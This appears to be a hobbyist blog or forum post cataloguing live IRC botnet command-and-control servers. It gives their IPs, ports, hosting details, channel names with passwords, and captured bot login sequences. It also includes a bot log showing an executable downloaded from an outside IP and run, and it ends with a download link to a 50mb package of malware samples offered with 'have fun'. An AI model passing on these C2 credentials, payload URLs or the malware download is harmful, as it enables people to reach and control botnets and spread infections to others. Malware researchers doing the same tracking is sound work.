70.107.249.167:3921
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: “xvvv mssql 100 0 0 -a -r -s”
I got this info from Seb, another botnet lover lol
Hosting info: http://whois.domaintools.com/70.107.249.167
smellypussy.info (ngrBot very large irc botnet hosted in United States Henderson Trashy Media)
This botnet is a very big one, and the bot used for spreading is also special, with a lot of features inside like injection into multiple system processes, ruskill for killing processes, blocking AV updates, Windows security updates, MSN spread, FTP infection etc. Sample was captured by Xylitol and then I helped with finding more IPs and different samples.
main.xxxxxiseviumixxxxx.info (irc botnet hosted in Germany Berlin Active Media)
Remote Host                     Port Number
jky.no-ip.info                  3177          RAT here
main.xxxxxiseviumixxxxx.info    3211          IRCD here

NICK Sapphire{USA|XP-SP2}0300311
USER 03003114 “” “03003114” :03003114
MODE Sapphire{USA|XP-SP2}0300311
JOIN #Sapphire_2#
NICK New{USA|XP-SP2}1046453
USER 10464537 “” “10464537” :10464537
MODE New{USA|XP-SP2}1046453

Hosting info: http://whois.domaintools.com/88.198.219.113
95.173.179.231 (irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host       Port Number
95.173.179.231    6667

PASS codr00t
MODE [USA|XP|094124] -ix
JOIN #k codr00t
PRIVMSG #k :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|094124]
USER xfgbxix * 0 :COMPUTERNAME

Hosting info: http://whois.domaintools.com/95.173.179.231
01.cybernix.info (irc botnet hosted in United States Willowbrook Psinet Inc)
Remote Host         Port Number
01.cybernix.info    1750

PASS gsaxx00
NICK 0USA9j6m6dbn0n
USER XP-SP2 x x :COMPUTERNAME
JOIN ##pool P00L
NICK 0USAiky784di69

Hosting info: http://whois.domaintools.com/154.35.64.32
46.243.8.119 (irc botnet hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host                    Port Number
ircserver.taylor412gang.com    3941

NICK N[USA|XP][qhfpagj]
USER qhfp “” “lol” :qhfp
JOIN #apple apple57

Hosting info: http://whois.domaintools.com/46.243.8.119
ashland.aboutkiddies.com (irc botnet hosted in United States New York Webair Internet Development Company Inc)
Remote Host       Port Number
209.200.50.75     3800          PASS hax0r
213.251.170.52    80
91.200.241.40     80

* The data identified by the following URLs was then requested from the remote web server:
  o http://api.wipmania.com/
  o http://91.200.241.40/dq.exe

PRIVMSG #dpi :[d=”http://91.200.241.40/dq.exe” s=”23552 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\1.tmp” – Download retries: 0

PASS hax0r..KCIK
00000010 | 206E 7B55 537C 5850
homelessman.weedns.com (Mouse’s botnet hosted in the whole world lol)
This is prob one of the biggest botnets still alive, for years now.
dns: homelessman.weedns.com port: 3305
Resolved : [homelessman.weedns.com] To [80.247.72.130]
Resolved : [homelessman.weedns.com] To [92.62.231.115]
Resolved : [homelessman.weedns.com] To [202.117.53.21]
Resolved : [homelessman.weedns.com] To [156.26.121.177]
DNS List: ns.yumetairiku.co.jp:3305 virtual-mgsf.nebula.fi:3305 dell.aurius.sk:3305 cx10man.weedns.com:3305 fx010413.whyI.org:3305 gynoman.weedns.com:3305 c010x1.co.cc:3305 commgr.co.cc:3305 g.0x20.biz:3305 telephone.dd.blueline.be:3305 cx10man.weedns.com:3305 gynoman.weedns.com:3305 www.carpet-backing.com www.comofil.it www.iris-spa.it www.osteriadeltorchio.it ballslessman.weedns.com:3305 fx010413.whyi.org:3305
toxfeenyxx.sdeirc.net (phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host              Port Number
toxfeenyxx.sdeirc.net    3674

NICK N[USA|XP][tjxcvay]
USER tjxc “” “lol” :tjxc
JOIN #phoenix selling9309239
NICK N[USA|XP][baersyl]
USER baer “” “lol” :baer

Hosting info: http://whois.domaintools.com/46.243.8.142
50mb malware samples
This is another package with different malware, have fun.
Size: 50mb
Download: http://c65cdb0b.tubeviral.com